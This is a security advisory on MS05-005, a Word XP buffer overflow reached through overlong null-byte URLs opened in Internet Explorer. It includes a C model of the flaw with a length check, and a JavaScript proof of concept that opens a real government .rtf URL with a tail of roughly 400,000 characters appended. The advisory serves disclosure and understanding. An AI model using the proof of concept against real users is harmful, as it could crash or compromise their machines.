Microsoft Office XP Remote Buffer Overflow Technical Details (MS05-005)
Summary
A vulnerability in Microsoft Word XP allows an attacker to trigger a buffer overflow. The attack can occur when a user opens a Word document through Internet Explorer.
Credit:
The information has been provided by Rafel Ivgi.
Details
When a ".doc" file is opened inside Internet Explorer, Microsoft Word XP "takes over" and opens the document. The problem appears when the request for the document contains a null byte (%00) directly after the ".doc" file name, followed by an overlong string. Files with the ".rtf" extension are affected in the same way.
For Example:
http://example.com/myfile.doc is a valid request.
However, the following is an invalid request: http://example.com/myfile.doc%00aaaaaaaaaaaaaaaaaaaaaaa...aa.doc. Such a request is nevertheless sent to the server hosting the document.
Most servers, IIS and Apache included, treat the path as a C string and truncate it at the %00, so they serve myfile.doc as if nothing followed the null byte. Internet Explorer, however, still hands the full, untruncated string to Microsoft Word XP, which therefore receives a file name far longer than it expects. This string causes an exploitable buffer overflow, allowing remote code execution.
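The mismatch described above, as an added example written for this page (a constructed model, not code from Internet Explorer, Word, or the original advisory): a small percent-decoder turns %00 into a literal NUL byte; the server-side view stops at that NUL, as IIS and Apache do, while the client-side view keeps the full counted length and copies it into a fixed-size path buffer. The buffer size VIEWER_PATH_CAP (260), the function names and the 5000-byte tail are assumptions chosen for illustration; the length check in handoff_to_viewer is the one a vulnerable handoff lacks.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Assumed fixed-size path buffer in the viewer (modelled on MAX_PATH). */
#define VIEWER_PATH_CAP 260

/* Percent-decode a URL path into a length-counted byte buffer.
 * %00 becomes a literal NUL byte instead of terminating the string.
 * Returns the number of bytes written (never more than dst_cap). */
size_t url_decode(const char *src, unsigned char *dst, size_t dst_cap)
{
    size_t n = 0;
    while (*src != '\0' && n < dst_cap) {
        if (src[0] == '%' && isxdigit((unsigned char)src[1]) &&
            isxdigit((unsigned char)src[2])) {
            char hex[3] = { src[1], src[2], '\0' };
            dst[n++] = (unsigned char)strtoul(hex, NULL, 16);
            src += 3;
        } else {
            dst[n++] = (unsigned char)*src++;
        }
    }
    return n;
}

/* Server side: the decoded path is treated as a C string, so the first NUL
 * ends it. Returns the length the server actually uses to look up the file. */
size_t server_visible_length(const unsigned char *decoded, size_t len)
{
    const unsigned char *nul = memchr(decoded, 0, len);
    return nul ? (size_t)(nul - decoded) : len;
}

/* Client side: the full counted string is handed to the viewer's fixed
 * buffer. Returns 0 on success, -1 when it does not fit. The check on the
 * first line is the one a vulnerable handoff lacks; without it memcpy
 * runs past the buffer and corrupts whatever follows it. */
int handoff_to_viewer(const unsigned char *decoded, size_t len,
                      char *out, size_t out_cap)
{
    if (len >= out_cap)
        return -1;
    memcpy(out, decoded, len);
    out[len] = '\0';
    return 0;
}

/* Build a URL in the shape of the advisory's request: a real filename,
 * a %00 separator, tail_len filler bytes and a ".doc" suffix.
 * Caller frees the result. */
char *build_attack_url(const char *filename, size_t tail_len)
{
    const char *suffix = ".doc";
    size_t fl = strlen(filename);
    size_t cap = fl + 3 + tail_len + strlen(suffix) + 1;
    char *url = malloc(cap);
    if (!url)
        return NULL;
    memcpy(url, filename, fl);
    memcpy(url + fl, "%00", 3);
    memset(url + fl + 3, 'a', tail_len);
    memcpy(url + fl + 3 + tail_len, suffix, strlen(suffix) + 1);
    return url;
}

/* Run one URL through both views. Fills in what the server sees and what
 * the client passes on; returns the handoff result (0 ok, -1 overflow). */
int trace_request(const char *url, size_t *server_len, size_t *client_len)
{
    unsigned char decoded[8192];
    char viewer_path[VIEWER_PATH_CAP];
    size_t len = url_decode(url, decoded, sizeof decoded);
    *server_len = server_visible_length(decoded, len);
    *client_len = len;
    return handoff_to_viewer(decoded, len, viewer_path, sizeof viewer_path);
}

int main(void)
{
    size_t s, c;
    int rc = trace_request("myfile.doc", &s, &c);
    printf("benign: server sees %zu bytes, client passes %zu, handoff=%d\n",
           s, c, rc);

    char *url = build_attack_url("myfile.doc", 5000);   /* constructed input */
    rc = trace_request(url, &s, &c);
    printf("attack: server sees %zu bytes, client passes %zu, handoff=%d\n",
           s, c, rc);
    free(url);
    return 0;
}
```

The benign URL passes both views unchanged. The attack URL is served as myfile.doc by the server (10 visible bytes) but arrives at the viewer as 5015 counted bytes and is rejected by the length check; remove that check and the memcpy writes past the 260-byte buffer, which is the condition the advisory describes.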
Proof of Concept Code:
<script type="text/javascript">
// Build the overlong tail: a run of 'b' characters appended 4999 times.
var mylongstring, myjunk, c;
mylongstring = "";
myjunk = "bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb";
for (c = 1; c < 5000; c++) {
    mylongstring = mylongstring + myjunk;
}
// Open a real .rtf URL with the tail appended after a separator byte
// (this PoC as published uses %0a; the Details section describes %00).
// The server serves the real file; Internet Explorer hands the whole
// string to Word.
window.open("http://www.hhs.gov/ocr/privacysummary.rtf%0a" + mylongstring);
</script>
Vendor Status:
Microsoft was notified on July 13, 2004.
Microsoft has released an advisory and patches for this vulnerability. For further details please refer to:
Vulnerability in Microsoft Office XP could allow Remote Code Execution (MS05-005)